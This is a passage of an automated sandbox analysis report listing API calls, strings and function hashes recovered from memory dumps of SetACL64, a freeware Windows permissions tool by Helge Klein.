                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                  • String ID: failed with: $ the privilege $Enabling$SetPrivilege
                                                  • API String ID: 152255395-1151176482
                                                  • Opcode ID: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                                                  • Instruction ID: b4388f663155be75bece0bb29e691e3ef76f1f1a1ce4b7c66d579c3a7e9c5b3d
                                                  • Opcode Fuzzy Hash: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                                                  • Instruction Fuzzy Hash: 4CD18672B1474281FB00EF66E4443AD6761EB497B8FA14235DA5E13AEADFBCE190C310
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                  • String ID:
                                                  • API String ID: 3939093798-0
                                                  • Opcode ID: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
                                                  • Instruction ID: 7c4c18335df79af66ffb0c1250ee8c4565d1f389cda378b66e83430f7be7d83e
                                                  • Opcode Fuzzy Hash: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
                                                  • Instruction Fuzzy Hash: B7716B22F04A4289FB51EF66D4606BCA7A0BF4CB64FC44435CE1D57696EFBCA845C360
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                                                  • Instruction ID: ce1df5b451c5d5f7f7adb6522fd240fb6ce0a18ad685d74dc21816fa9d229e63
                                                  • Opcode Fuzzy Hash: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                                                  • Instruction Fuzzy Hash: 34315372708B8185EB60DF62E8403EDB364FB89754F84443ADA4D47B96DF78D558CB20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                  • String ID: APPLICATION PACKAGE AUTHORITY$Font Driver Host$IIS AppPool$NT AUTHORITY$NT SERVICE$NT VIRTUAL MACHINE$WINDOW MANAGER
                                                  • API String ID: 2016263034-1572346215
                                                  • Opcode ID: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
                                                  • Instruction ID: 7c0341c2844c0523c06c25abbc3fe5d1cbaa2a1659eeb6f46299931a9c8c4e74
                                                  • Opcode Fuzzy Hash: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
                                                  • Instruction Fuzzy Hash: 91527F26B05A0685EF14EF66D0581BDA7A0EB8DFD8B854436CE0E137A6EE7DD444C360
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                                  • Instruction ID: 54f2246d0455df1e844fcca89712d7b28e4d12443baa287020dab143d9b95e36
                                                  • Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                                  • Instruction Fuzzy Hash: 78A1E762B18A8581EB10EF6394102BAE7A4FB8CBF4F944136DE5D07B86DFBCE4458310
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                                                  • Instruction ID: 489a32da95c599ce50c895f43708919a43809b7d5b4455c68631e09fda6baad2
                                                  • Opcode Fuzzy Hash: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                                                  • Instruction Fuzzy Hash: 62319132608B8186DB60DF66E8402AEB3A0FB8D764F940136EB8D43B96DF7CD555CB10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                  • String ID: %
                                                  • API String ID: 1283921372-2567322570
                                                  • Opcode ID: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
                                                  • Instruction ID: d0c9efe17c2654536e28a57b5311861927bc00f6298c631ee5cdb35cfed95c33
                                                  • Opcode Fuzzy Hash: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
                                                  • Instruction Fuzzy Hash: 5772FF22B18A858AEB11DF6AD0403ADB3B1EB48B98FA54031DF4D57B9ADF7CD545C320
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                                                  • Instruction ID: 24947e0bce3123c851c4d18bd8b7f53a84ef4d37f56ae465c1883175e7d575cb
                                                  • Opcode Fuzzy Hash: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                                                  • Instruction Fuzzy Hash: 30B1A272A0874181EB14AF26E44436DB3A5EB5CBE8FD04136DB8C07A9ADFBCD591C750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 678723381-0
                                                  • Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                                  • Instruction ID: 198e129940faf41a43d76aa0e235e77ae99b113cc6548edbf98ed704ad1255fc
                                                  • Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                                  • Instruction Fuzzy Hash: 7641A822A1878181EB109F25E44436DB361EB89BF4F945234EB9E07BA6DF7CF190C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: InfoLocaletry_get_function
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2200034068-2904428671
                                                  APIs
                                                  Similarity
                                                  • API ID: memcpy_s
                                                  • String ID:
                                                  • API String ID: 1502251526-0
                                                  APIs
                                                  Similarity
                                                  • API ID: ExceptionRaise_clrfp
                                                  • String ID:
                                                  • API String ID: 15204871-0
                                                  APIs
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID:
                                                  • API String ID: 1807457897-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Similarity
                                                  • API ID: _get_daylight_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 474895018-0
                                                  APIs
                                                    • Part of subcall function 00007FF7C1753E64: GetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753E73
                                                    • Part of subcall function 00007FF7C1753E64: SetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753F11
                                                  • GetLocaleInfoW.KERNEL32 ref: 00007FF7C17573A8
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  APIs
                                                    • Part of subcall function 00007FF7C1753E64: GetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753E73
                                                    • Part of subcall function 00007FF7C1753E64: SetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753F11
                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00007FF7C17572F1), ref: 00007FF7C175757F
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  APIs
                                                  • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7C1757D71,?,?,?,?,?,?,?,?,00000000,00007FF7C17565D8), ref: 00007FF7C175796B
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -
                                                  • API String ID: 0-2547889144
                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 00007FF7C175B7F1
                                                    • Part of subcall function 00007FF7C1754FDC: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7C175403D,?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000), ref: 00007FF7C1755031
                                                    • Part of subcall function 00007FF7C1755054: HeapFree.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175506A
                                                    • Part of subcall function 00007FF7C1755054: GetLastError.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175507C
                                                    • Part of subcall function 00007FF7C1760AE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C1760B0E
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3806578645-0
                                                  APIs
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID:
                                                  • API String ID: 2573137834-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
                                                  • Instruction ID: 4869eb97bbda6540b9cb37136d3d6beec4e7c17407f4603d89346a667b661134
                                                  • Opcode Fuzzy Hash: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
                                                  • Instruction Fuzzy Hash: 27D18D62A19B8580EF50EF06D050279B3A1FB88FA4FA54536EE8D07B59EFBCD452C350
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                                                  • String ID:
                                                  • API String ID: 959782435-0
                                                  • Opcode ID: 0144b5a661d66d38d76c24466dcf0781ce32cf37b2c1c40fd104419fcb5013a3
                                                  • Instruction ID: 390990b39bbc119b545ee2e925878d1b6025c69a392c59ff809ef66012ef3a69
                                                  • Opcode Fuzzy Hash: 0144b5a661d66d38d76c24466dcf0781ce32cf37b2c1c40fd104419fcb5013a3
                                                  • Instruction Fuzzy Hash: 24B13D72A08A4682E764FF22D4216B9B360FB48B68F804135EF5D436C6DFBCE552C760
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
                                                  • Instruction ID: 9f7712e4d617470bb3baa953ced5549df72a335a0c33bc628c3860dd9906ce02
                                                  • Opcode Fuzzy Hash: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
                                                  • Instruction Fuzzy Hash: 1A6118A2B18B8982EF109F5AD4405B9A360FB5C7A0F845231DF5E57B85DFBCE580C310
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                                                  • Instruction ID: 2bd5bfa4c1cc718ce5768b5f69165fd38d0465cc88e463c11ef8e4472be83e2a
                                                  • Opcode Fuzzy Hash: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                                                  • Instruction Fuzzy Hash: 80F06271B186958BDBA4DF6AA802629B7E0F74D3E0FD4C079D69D83B04DA7C90608F14
                                                  APIs
                                                    • Part of subcall function 00007FF7C1714810: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C1714859
                                                    • Part of subcall function 00007FF7C1714810: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C171486D
                                                    • Part of subcall function 00007FF7C1714810: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C1714882
                                                    • Part of subcall function 00007FF7C1714810: FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C1714964
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708D9E
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708DA4
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708DAA
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708DB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Resource_invalid_parameter_noinfo_noreturn$FindFreeLoadLock
                                                  • String ID: SetACL by Helge Klein$ -actn Action1 ParametersForAction1$ [-actn Action2 ParametersForAction2]$ [Options]$=======$==============$Copyright: Helge Klein$Documentation and examples are maintained at$Documentation:$FileVersion$Homepage: https://helgeklein.com$License: Freeware$SetACL -on ObjectName -ot ObjectType$Syntax:$The usage reference can be found at$Version: $https://helgeklein.com.$https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
                                                  • API String ID: 3000141576-3422969368
                                                  • Opcode ID: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                                                  • Instruction ID: 61dd24703bdff151b1a3b22811721ab8af189c6c09d3983e8898944762119795
                                                  • Opcode Fuzzy Hash: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                                                  • Instruction Fuzzy Hash: A9914B61F28A4294EB00FF66E8513B8A321BF98368FD14631D61E426E7DFACE554C360
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17582AF
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17582CE
                                                    • Part of subcall function 00007FF7C1757998: GetProcAddress.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757AF0
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17582ED
                                                    • Part of subcall function 00007FF7C1757998: LoadLibraryW.KERNELBASE(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757A3B
                                                    • Part of subcall function 00007FF7C1757998: GetLastError.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757A49
                                                    • Part of subcall function 00007FF7C1757998: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757A8B
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C175830C
                                                    • Part of subcall function 00007FF7C1757998: FreeLibrary.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757AC4
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C175832B
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C175834A
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C1758369
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C1758388
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17583A7
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17583C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
